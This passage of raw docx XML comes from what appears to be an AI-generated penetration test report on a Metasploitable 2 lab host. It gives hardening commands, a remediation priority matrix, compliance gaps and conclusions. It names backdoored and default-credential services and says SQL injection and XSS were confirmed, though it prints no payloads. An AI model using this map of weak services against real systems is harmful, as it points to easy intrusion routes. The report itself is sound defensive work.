                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get remove distcc -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 3632/tcp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PostgreSQL 8.3</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5432</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Change default password; bind to localhost</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su - postgres -c "psql -c \"ALTER USER postgres PASSWORD 'STRONG_PASS';\""</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">sed -i "s/listen_addresses = '\*'/listen_addresses = 'localhost'/" /etc/postgresql/*/main/postgresql.conf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart postgresql</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 5432/tcp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VNC</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5900</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Set strong password; restrict to localhost</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vncpasswd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 5900/tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 5901/tcp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X11</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6000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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Disable X11 TCP forwarding</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echo 'DisallowTCP true' &gt;&gt; /etc/X11/xorg.conf.d/10-security.conf</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 6000/tcp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UnrealIRCd 3.2.8.1</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6667/6697</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Remove backdoored UnrealIRCd</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systemctl stop unrealircd; pkill -f unrealircd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get remove --purge unrealircd -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 6667/tcp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 6697/tcp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AJP Connector (Ghostcat)</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8009</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Disable AJP connector in server.xml</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sed -i 's/&lt;Connector port="8009".*\/&gt;/&lt;!-- AJP disabled --&gt;/' /etc/tomcat*/server.xml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart tomcat*</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">ufw deny 8009/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache Tomcat 5.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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bCs/>
                <w:color w:val="1B4F72"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8180</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Change default creds; restrict manager app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3726"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="333333" w:sz="4"/>
              <w:left w:val="single" w:color="333333" w:sz="4"/>
              <w:bottom w:val="single" w:color="333333" w:sz="4"/>
              <w:right w:val="single" w:color="333333" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="1E1E1E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"># Edit /etc/tomcat*/tomcat-users.xml — change password</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">apt-get upgrade tomcat* -y</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="10" w:before="10"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF88"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl restart tomcat*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Remediation Priority Matrix</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000"/>
        <w:gridCol w:w="3500"/>
        <w:gridCol w:w="1900"/>
        <w:gridCol w:w="1626"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Timeframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1626"/>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Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FADBD8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">IMMEDIATE
(Before any
network use)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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vsftpd 2.3.4, UnrealIRCd 3.2.8.1, Bind Shell (1524), rexec/rlogin, Tomcat Manager, DistCC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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&lt; 24 hours</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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDEBD0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A04000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">URGENT
(Within 1 week)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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MySQL (empty password), PostgreSQL (default creds), VNC (weak password), AJP/Ghostcat, PHP/Apache upgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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1–7 days</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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7D6608"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH
(Within 2 weeks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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SSH (upgrade OpenSSH), Telnet (disable), X11 (disable TCP), NFS (access controls), SMTP hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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1–2 weeks</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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF2FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM
(Within 1 month)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Security headers on all web services, Remove phpinfo/Easter Eggs, Disable directory indexing, BIND upgrade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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2–4 weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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7. Compliance Gap Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The identified vulnerabilities represent failures across multiple security standards and frameworks. The table below maps critical findings to relevant compliance requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="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800"/>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="4826"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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Control Ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4826"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B4F72" w:sz="4"/>
              <w:left w:val="single" w:color="1B4F72" w:sz="4"/>
              <w:bottom w:val="single" w:color="1B4F72" w:sz="4"/>
              <w:right w:val="single" w:color="1B4F72" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="1B4F72" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Finding / Gap</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ISO 27001:2022</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A.8.8 — Vulnerability Management</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73 unpatched CVEs including 7 Critical; no evidence of vulnerability management process</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ISO 27001:2022</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A.8.20 — Network Security</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26 services exposed with no network segmentation or ingress filtering</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ISO 27001:2022</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A.5.17 — Authentication</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Default/empty credentials on MySQL, PostgreSQL, VNC, Tomcat, and Telnet</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PCI-DSS v4.0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Req 6.3 — Security Vulnerabilities</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Multiple Critical CVEs unpatched; CVSS 9.8 and 10.0 findings present</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PCI-DSS v4.0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Req 1.3 — Network Access Controls</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No firewall rules restricting unnecessary service exposure</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PCI-DSS v4.0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Req 8.3 — Strong Authentication</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Blank/default credentials across six services</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OWASP Top 10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A03:2021 — Injection</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SQL Injection confirmed on Mutillidae; MySQL/PostgreSQL OS command injection possible</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OWASP Top 10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A07:2021 — Identification &amp; Authentication</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Default credentials and no account lockout on database and remote access services</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OWASP Top 10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A05:2021 — Security Misconfiguration</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Tomcat Manager, phpinfo(), directory listing, X11, and AJP all publicly accessible</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OWASP Top 10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A03:2021 — XSS (A07 in OWASP 2017)</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15 reflected XSS PoCs confirmed in Mutillidae web application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST CSF 2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1B4F72"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">PR.PS-2 — Software Maintenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4826"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Multiple EOL software versions: PHP 5.2, Apache 2.2, OpenSSH 4.7, MySQL 5.0, PostgreSQL 8.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B4F72" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D2137"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Conclusions &amp; Next Steps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Conclusions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The target system 192.168.64.2 (Metasploitable 2) represents the most severe security posture possible. Every major vulnerability category — backdoored software, default credentials, unpatched critical CVEs, insecure services, and vulnerable web applications — is present and exploitable without specialist knowledge. The system should be treated as fully compromised and should under no circumstances be connected to a production network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The PentestMCP AI engine confirmed that a real-world threat actor with access to standard penetration testing tools (Metasploit, sqlmap, Nikto) could achieve complete system compromise within minutes of initial network access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Immediate Actions Required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate the system from all production networks immediately</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch or remove all backdoored software: vsftpd 2.3.4 and UnrealIRCd 3.2.8.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Change all default and blank credentials (MySQL root, PostgreSQL postgres, VNC, Tomcat)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable all unnecessary services (Telnet, rexec, rlogin, rsh, X11, DistCC, AJP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy a host-based firewall (ufw/iptables) permitting only required services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Engage a qualified security team to perform a verified remediation and re-test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
